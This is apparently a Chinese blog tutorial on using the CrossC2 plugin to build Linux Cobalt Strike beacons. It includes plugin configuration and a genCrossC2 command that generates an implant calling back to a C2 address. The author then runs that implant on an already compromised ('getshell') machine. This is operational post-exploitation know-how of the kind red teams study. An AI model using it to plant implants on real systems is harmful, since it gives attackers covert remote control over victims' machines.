概述

利用CrossC2插件解决Linux无法上线CobaltStrike

插件地址

https://github.com/gloxec/CrossC2

使用

下载需要的CNA以及CS客户端类型

image-20231220184818465

配置CNA文件

$CC2_PATH是插件的绝对路径

$CC2_BIN 是配置客户端类型

image-20231220184956818

根据路径修改为

1
2
$CC2_PATH = "D:\\TPA\\CS CNA\\CrossC2\\"; # <-------- fix
$CC2_BIN = "genCrossC2.exe";

image-20231220192032101

下载服务端

下载teamserver下的.cobaltstrike.beacon_keys文件到本地

image-20231220195812077

创建CrossC2 Listener

image-20231220195705966

进行响应配置

image-20231220200043925

点击build,看Log执行了成功生成了t_c22.outt_c22.out.lib

image-20231220200143248

在CS的客户端目录进行查看

image-20231220200348667

上线Linux机器

image-20231220212746796

选择C2的监听器,之后执行curl命令

image-20231220212847752

到这里来说应该上线了,但是没有很看了很多资料文章无法解决,到这里采用第二种方式不用GUI插件了(还是命令好使)

命令生成上线

首先建一个HTTPS的监听器,必须是HTTPS

image-20231220213151371

将服务器的.cobaltstrike.beacon_keys文件放在与下载的genCrossC2.Linux在同一目录下,我直接将genCrossC2.Linux放在了Teamserver的目录下(也可以指定)

给执行权限然后执行命令

1
./genCrossC2.Linux 192.168.157.201 443 null null Linux x64 test

image-20231220213530621

上传到getshell的机器执行test文件,成功上线Linux机器

image-20231220213705374

__END__